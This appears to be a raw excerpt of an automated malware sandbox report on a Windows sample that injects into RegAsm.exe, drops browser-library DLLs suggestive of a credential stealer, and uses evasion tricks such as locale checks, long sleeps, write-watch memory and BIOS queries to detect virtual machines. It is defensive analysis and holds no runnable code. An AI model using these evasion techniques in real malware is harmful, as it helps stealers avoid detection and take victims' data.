Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 5040000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 24B0000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 44B0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe	Thread delayed: delay time: 922337203685477

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe TID: 5380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe TID: 1204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\HDAFIIDAKJ.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5144	Thread sleep count: 80 > 30

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	29_2_00413EA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

29_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

